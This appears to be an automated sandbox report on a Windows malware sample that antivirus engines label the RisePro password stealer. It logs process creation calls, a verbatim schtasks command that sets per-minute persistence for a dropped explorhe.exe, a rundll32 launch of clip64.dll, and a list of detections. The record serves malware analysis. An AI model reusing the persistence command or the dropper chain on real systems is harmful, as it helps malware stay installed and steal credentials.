NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000114 suspend_count: 1 process_identifier: 804	1	0
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 912 thread_handle: 0x0000033c process_identifier: 316 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000344	1	1
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000114 suspend_count: 1 process_identifier: 316	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000274 suspend_count: 1 process_identifier: 316	1	0
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 2472 thread_handle: 0x00000298 process_identifier: 2460 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a0	1	1
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 1668 thread_handle: 0x000003d0 process_identifier: 1664 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\1000609001\stan.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000609001\stan.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000609001\stan.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003ec	1	1
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 2932 thread_handle: 0x000003d8 process_identifier: 2976 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\1000629001\installs.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000629001\installs.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000629001\installs.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003f4	1	1
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 2092 thread_handle: 0x00000380 process_identifier: 2108 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\1000630001\fsdfsfsfs.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000630001\fsdfsfsfs.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000630001\fsdfsfsfs.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003e8	1	1
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 2980 thread_handle: 0x0000037c process_identifier: 2060 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\1000631001\MRK.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000631001\MRK.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000631001\MRK.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000410	1	1
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 2472 thread_handle: 0x000003f0 process_identifier: 2992 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\1000632001\sadsadsadsa.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000632001\sadsadsadsa.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000632001\sadsadsadsa.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003e8	1	1
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 2508 thread_handle: 0x00000370 process_identifier: 2660 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\1000634001\Atqumy.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000634001\Atqumy.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000634001\Atqumy.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000414	1	1
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 3132 thread_handle: 0x0000042c process_identifier: 3128 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Windows\System32\rundll32.exe track: 1 command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main filepath_r: C:\Windows\System32\rundll32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000444	1	1
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 3200 thread_handle: 0x0000040c process_identifier: 3196 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\1000636001\latestrocki.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000636001\latestrocki.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000636001\latestrocki.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000414	1	1
CreateProcessInternalW Jan. 26, 2024, 9:02 a.m.	thread_identifier: 3828 thread_handle: 0x00000408 process_identifier: 3824 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\1000639001\moto.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000639001\moto.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000639001\moto.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000041c	1	1
CreateProcessInternalW Jan. 26, 2024, 9:02 a.m.	thread_identifier: 1152 thread_handle: 0x00000410 process_identifier: 1464 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\1000640001\crypted.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000640001\crypted.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000640001\crypted.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000418	1	1
CreateProcessInternalW Jan. 26, 2024, 9:02 a.m.	thread_identifier: 3208 thread_handle: 0x000003dc process_identifier: 3212 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\1000641001\2024.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000641001\2024.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000641001\2024.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000424	1	1
CreateProcessInternalW Jan. 26, 2024, 9:02 a.m.	thread_identifier: 3396 thread_handle: 0x0000040c process_identifier: 3372 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\1000642001\alex.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000642001\alex.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000642001\alex.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000420	1	1
CreateProcessInternalW Jan. 26, 2024, 9:02 a.m.	thread_identifier: 3540 thread_handle: 0x00000408 process_identifier: 3532 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\1000643001\rdx1122.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000643001\rdx1122.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000643001\rdx1122.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003d4	1	1
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2028	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 2028	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 2028	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000130 suspend_count: 1 process_identifier: 2868	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x000001b0 suspend_count: 1 process_identifier: 2868	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000130 suspend_count: 1 process_identifier: 1664	1	0
NtResumeThread Jan. 26, 2024, 9:02 a.m.	thread_handle: 0x000001b0 suspend_count: 1 process_identifier: 1664	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2108	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2108	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x000001c4 suspend_count: 1 process_identifier: 2108	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000210 suspend_count: 1 process_identifier: 2108	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000228 suspend_count: 1 process_identifier: 2108	1	0

File has been identified by 38 AntiVirus engines on VirusTotal as malicious (38 events)

Bkav	W32.AIDetectMalware
tehtris	Generic.Malware
Cynet	Malicious (score: 100)
ALYac	Gen:Variant.Ser.Zusy.4824
Cylance	unsafe
VIPRE	Gen:Variant.Ser.Zusy.4824
Sangfor	Suspicious.Win32.Save.ins
BitDefender	Gen:Variant.Zusy.534333
Cybereason	malicious.f4bbbf
Arcabit	Trojan.Zusy.D8273D
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/Packed.Enigma.AAF
APEX	Malicious
Avast	WAT:Blacked-E
ClamAV	Win.Trojan.Scar-6903585-0
Kaspersky	VHO:Trojan-PSW.Win32.RisePro.awm
MicroWorld-eScan	Gen:Variant.Zusy.534333
Emsisoft	Gen:Variant.Zusy.534333 (B)
FireEye	Generic.mg.2f9214f932a930a4
Ikarus	Trojan.Win32.Scar
Google	Detected
MAX	malware (ai score=87)
Antiy-AVL	Trojan[Packed]/Win32.Enigma
Kingsoft	Win32.HeurC.KVMH008.a
Microsoft	Trojan:Win32/Sabsik.TE.B!ml
ZoneAlarm	VHO:Trojan-PSW.Win32.RisePro.awm
GData	Win32.Trojan.PSE.AA1G04
Varist	W32/RisePro.A.gen!Eldorado
AhnLab-V3	Malware/Win.Generic.R632639
BitDefenderTheta	Gen:NN.ZexaF.36680.jHW@aKG4ybfk
DeepInstinct	MALICIOUS
VBA32	BScope.Trojan.Bitrep
Malwarebytes	Generic.Malware.AI.DDS
Panda	Trj/Genetic.gen
Zoner	Probably Heur.ExeHeaderL
SentinelOne	Static AI - Malicious PE
AVG	WAT:Blacked-E

rost.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All